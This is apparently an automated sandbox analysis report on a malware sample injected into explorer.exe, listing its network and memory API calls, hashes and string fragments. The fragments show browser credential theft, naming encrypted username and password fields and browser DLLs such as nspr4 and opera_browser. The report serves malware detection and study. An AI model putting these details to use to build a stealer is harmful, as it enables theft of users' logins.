					_t33 =  *0x7ffe0014;
					_t25 =  *0x7ffe001c;
					do {
					} while (_t12 != _t25);
					return (_t33 + _a4 << 0x00000012 ^ _t33 + _a4 >> 0x00000007) & 0x0007ffff ^ _t33 + _a4 << 0x00000012 ^ _t26 >> 0x0000000d ^ 0x0618d8cb;
				}
			}

0x0039c3d8
0x0039c3de
0x0039c43c
0x0039c441
0x0039c441
0x0039c467
0x0039c3e0
0x0039c3e3
0x0039c3e8
0x0039c3ee
0x0039c3f4
0x0039c3f4
0x0039c421
0x0039c421

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc80d08a39918c4ed8aeb2866cd1023b7fb2be4dddb15263f5103115e3a7b4bb
Instruction ID: d410396b1561baf5d941e9f7224e9dc7148de5647b20c30040d8c727daeb0296
Opcode Fuzzy Hash: fc80d08a39918c4ed8aeb2866cd1023b7fb2be4dddb15263f5103115e3a7b4bb
Instruction Fuzzy Hash: 97F02B3B7205068B4BDCD519CC819273383E7C53043B8DA3CD926EB3A9C938EA12D654

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3320, Parent PID: 5492COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.6%
Total number of Nodes:	458
Total number of Limit Nodes:	18

Executed Functions

Function 047A8F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 047A912E
setsockopt.WS2_32 ref: 047A9830
recv.WS2_32 ref: 047A9859

Strings

&un=, xrefs: 047A94F1
tion, xrefs: 047A9331
GET , xrefs: 047A9318
: cl, xrefs: 047A9338
nnec, xrefs: 047A932A
&br=, xrefs: 047A9509
Co, xrefs: 047A9323
ose, xrefs: 047A933F
dat=, xrefs: 047A9290
&sql, xrefs: 047A9471

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 69cde7d31a9c45189edf3d3ac36846da7a9a9f3dc51fcf40903228a3ccd5e79f
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 73529570614A088FDB69EF68C4887EAB7E1FB94304F504A2DD59FD7242EE30B565CB81

Uniqueness

Uniqueness Score: -1.00%

Function 047A8232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 047A8449

Strings

`, xrefs: 047A841D

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: c2406d328c1061124433baf6bd9aa05299a9d18a5d280840a03483bcf8be8a30
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 49225C70A18A099FCB59EF68C4986AEF7E1FB98305F41072ED45ED7250DB30E461CB86

Uniqueness

Uniqueness Score: -1.00%

Function 047A9E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 047A9E67

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 77d88286a13db602683b48c92bf32d736ddf3417bd0725409c01801a0b13bfc9
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 9A019E34628B484F9B88EF6C948412AB7E4FBC9214F000B3EA99AC3250EB60D5414B42

Uniqueness

Uniqueness Score: -1.00%

Function 047A9E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 047A9E67

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 43d7ac1725406d19bf9dff984642bb01dfc6c636b608808bd0cf1a84bbbf05a3
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 5C01A274628B884F8B48EF7C94452A6B3E5FBCE314F000B3EE99AC3241DB21D5024B82

Uniqueness

Uniqueness Score: -1.00%

Function 047A38C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 047A39A0

Strings

urlmon.dll, xrefs: 047A3959
on.d, xrefs: 047A3902
nt: , xrefs: 047A391E
User-Agent: , xrefs: 047A3935, 047A3948

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: eef592755960e1be52919332190e370732116d7739f69e0371a3674618f97549
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 0A31D171614A0C8FDB04EFA8C8887EEB7E0FB98208F40022AD54ED7340EF749655C78A

Uniqueness

Uniqueness Score: -1.00%

Function 047A38BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 047A39A0

Strings

urlmon.dll, xrefs: 047A3959
on.d, xrefs: 047A3902
nt: , xrefs: 047A391E
User-Agent: , xrefs: 047A3935, 047A3948

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: a07ca4b72f33462b789102a1dd2ec2b780a71a156b8ef31ec62f640bfbf4b8cd
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: C121C370610A0C8FDB05EFA8C8487EEBBA4FF98208F40432AD55AD7340DF749655C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0479FB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0479FCCA

Strings

el32, xrefs: 0479FBA0
kern, xrefs: 0479FB99
.dll, xrefs: 0479FBCD

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: ac60ee6bac669d66906645b9a0757fc888f03c1cc215e9cffbd32410cacf5de1
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 1A416C70918A088FDF54EFA8C8987AD77E0FB98305F04467AD84ADB255EE30A945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0479FB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0479FCCA

Strings

el32, xrefs: 0479FBA0
kern, xrefs: 0479FB99
.dll, xrefs: 0479FBCD

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: c1aa0685fa96da16aae854a29c7d3fafba56d7a1085eeb8caca9d2efc6dd9353
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 0A412B70918A088FDF94EFA8C4987AD77F0FBA8305F04427AC84EDB255DE34A955CB85

Uniqueness

Uniqueness Score: -1.00%

Function 047A572E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 047A5791

Strings

conn, xrefs: 047A575A
ect, xrefs: 047A5761

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 59cc1f85229a354647b17c252f76e16d44f31bad6a69c91e32c6c8075f525546
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 43015E30618B188FCB84EF5CE088B55B7E0FB98314F1546AED90DCB226C674D8818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 047A5732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 047A5791

Strings

conn, xrefs: 047A575A
ect, xrefs: 047A5761

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 26b349985e643b07e4daff3c6232cf7170a063ba609e80ed5e0d10f25bea0913
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 4C014470618A1C8FCB84EF5CE048B5577E0FB59315F1545AED80DCB226C774D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 047A562C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 047A5691

Strings

tart, xrefs: 047A565A
WSAS, xrefs: 047A5653

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
Instruction ID: 29b822924bb556e0f15ef8472a521535d2339bb979e6cb05f6a7e098cf0b8e5c
Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
Instruction Fuzzy Hash: AB018B30518A188FCB44DF1CD04CB69BBE0FB58351F2502A9D409CB266C7B0C9428B96

Uniqueness

Uniqueness Score: -1.00%

Function 047A5632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 047A5691

Strings

tart, xrefs: 047A565A
WSAS, xrefs: 047A5653

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
Instruction ID: c8b5aae7289ee53daa5fb1e9eda9508db4a3c6a5567751665a26bb26b6288390
Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
Instruction Fuzzy Hash: 70014B70518A188FCB44EF1C904CB69BBE0FB58351F2542A9E40DCB266C7B0C9418B96

Uniqueness

Uniqueness Score: -1.00%

Function 047A56B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 047A5713

Strings

send, xrefs: 047A56DA

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 536e68f4545f91d2c40898458fa6d169863e375295996af204aac9457dc5ece2
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: B3011270518A188FDB84EF5CD448B2577E0EB98314F1646AED85DCB366C670D8818B86

Uniqueness

Uniqueness Score: -1.00%

Function 047A55B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 047A5611

Strings

sock, xrefs: 047A55D9

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 0ed133b779e51096235aeded9c0a239a34a9c1cbac4bd6a0ed12bd33d73c7f9f
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 180121706186188FCB84EF5CD048B54BBE0FB59354F1545ADD45ECB366C7B0D9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 0479D2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0479D32D

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: a308836842c9a3b0e17c6dea78149f9b87b882bd8fc4efe1171c21b3e0071979
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 62316DB4614B09DFDF64EF2990882E5B7E0FB54305F44467EC91DCA206C738A850CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0479D412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 0479D461

Memory Dump Source

Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4790000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: baa4f0636d40d1991f2cff3920f367aae9f249b3f4ac6143522a4aa1cf0158cb
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: B9F0F630268B484FEB88EF6CD44563AF3D0FBE8214F45063EA94DC3364DA39D5818756

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0DEABD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

S, xrefs: 0DEAC073
dll, xrefs: 0DEABF4C
kern, xrefs: 0DEABF5A
el32, xrefs: 0DEABF27
ll, xrefs: 0DEABF13
M, xrefs: 0DEAC082
.dll, xrefs: 0DEABF2F
wini, xrefs: 0DEABF72
user, xrefs: 0DEABF03
32.d, xrefs: 0DEABF0B
net., xrefs: 0DEABF44

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 8b14ae214ddaa82c5449254ebd1440f83e5ac0fdad6cfc9778875380a436ea15
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 89E14574618B488FCB65EF68C4847EBB7E0FB58304F505A2E969BC7255DF30E5018B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAE792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 0DEAE8D2
dUse, xrefs: 0DEAE8AD
form, xrefs: 0DEAE84D
ypte, xrefs: 0DEAE8DA
ypte, xrefs: 0DEAE8A5
d, xrefs: 0DEAE8F2
name, xrefs: 0DEAE87D
itUR, xrefs: 0DEAE85D
guid, xrefs: 0DEAE7CE
Fiel, xrefs: 0DEAE884
dPas, xrefs: 0DEAE8E2
Subm, xrefs: 0DEAE855
e, xrefs: 0DEAE8BD
encr, xrefs: 0DEAE89D
rnam, xrefs: 0DEAE8B5
swor, xrefs: 0DEAE8EA
user, xrefs: 0DEAE876

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: f6fd2f111036879026bfcc26d9b2508348c19eaf364ee74b3e1d4dfbca37a15e
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: E9B19C30618B488EDB65EF68C489AEEB7F1FF98300F50551ED59ACB251EF70E4058B86

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAC622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

i, xrefs: 0DEAC69E
n, xrefs: 0DEAC6C1
d, xrefs: 0DEAC6A5
d, xrefs: 0DEAC67B
e, xrefs: 0DEAC66D
l, xrefs: 0DEAC6D6
d, xrefs: 0DEAC6CF
n, xrefs: 0DEAC6BA
c, xrefs: 0DEAC697
p, xrefs: 0DEAC690
u, xrefs: 0DEAC661
t, xrefs: 0DEAC6C8
l, xrefs: 0DEAC6AC
2, xrefs: 0DEAC674
s, xrefs: 0DEAC689
l, xrefs: 0DEAC682
w, xrefs: 0DEAC6B3

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 82f3fe1e0dff0aa0e150904d704427932f9f6d9ca38977584c102fcb770cac53
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 08419A70A18B0C8FDB149F9CA4456BE7BE2EB88704F00425EE809E7245DFB5ED458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB3AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 0DEB3C90
[, xrefs: 0DEB3C2D
n, xrefs: 0DEB3C98
], xrefs: 0DEB3CA8
[, xrefs: 0DEB3CCD
D, xrefs: 0DEB3CDA
[, xrefs: 0DEB3BF6
[, xrefs: 0DEB3C66
c, xrefs: 0DEB3C0B
e, xrefs: 0DEB3CA0
], xrefs: 0DEB3C3D
l, xrefs: 0DEB3CE2
b, xrefs: 0DEB3C73
l, xrefs: 0DEB3C35

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: fe0ce3c93ed1c4b20ab18b1a8daaed51f0ca8e50774f99f0ed0f26ef3802e336
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 24C15770218B499BC758EF28C885AEAF3E1FB98314F41572E959EC7250DF30F6158B86

Uniqueness

Uniqueness Score: -1.00%

Function 0DEB3F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0DEB3FA0
c, xrefs: 0DEB3FC8
., xrefs: 0DEB3F63
n, xrefs: 0DEB3F6B
r, xrefs: 0DEB3F88
r, xrefs: 0DEB3FB0
r, xrefs: 0DEB3FB8
r, xrefs: 0DEB3F98
0, xrefs: 0DEB3F5B
r, xrefs: 0DEB3FA8
r, xrefs: 0DEB3FC0
r, xrefs: 0DEB3F90

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 2f203c3944fb58b327013544186beb47088df5f5fde780c4f50d96c7b453e733
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 4C51C13051C7488FD719DF18D8852EBB7E5FB85714F502A2EE9CB87242DBB4E5068B82

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAD2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 0DEAD327
dll, xrefs: 0DEAD32E
nspr, xrefs: 0DEAD4D4
sspi, xrefs: 0DEAD320
4.dl, xrefs: 0DEAD4DB
dragon_s.dll, xrefs: 0DEAD614
opera_browser.dll, xrefs: 0DEAD629
l, xrefs: 0DEAD4E2

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: c9177b00488c7097370192e649f05fc07458ff3bd5604fdd8453874e6bab310a
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 64C1A070618A1A4FC758EF28D895AEAB3E0FB98314F81532D854EDB255DF30F901CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAD2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 0DEAD327
dll, xrefs: 0DEAD32E
nspr, xrefs: 0DEAD4D4
sspi, xrefs: 0DEAD320
4.dl, xrefs: 0DEAD4DB
dragon_s.dll, xrefs: 0DEAD614
opera_browser.dll, xrefs: 0DEAD629
l, xrefs: 0DEAD4E2

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 34a87c113d7ee73d64cbd1de785dfa186ed528028e6bc788818baf86a8e7e3b4
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: A9C1A070618A1A4FC758EF28D895AEAB3E1FB98314F81532D854EDB255DF30F901CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0DEAECD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 0DEAED9E
L: , xrefs: 0DEAED66
UR, xrefs: 0DEAED5F
2, xrefs: 0DEAEDE1
Pass, xrefs: 0DEAED97
name, xrefs: 0DEAEDB2
User, xrefs: 0DEAEDAB

Memory Dump Source

Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_de70000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: da122b8d6122445a74f0eae787ec5f6e5242567960bb3014c89c53fae6e55350
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
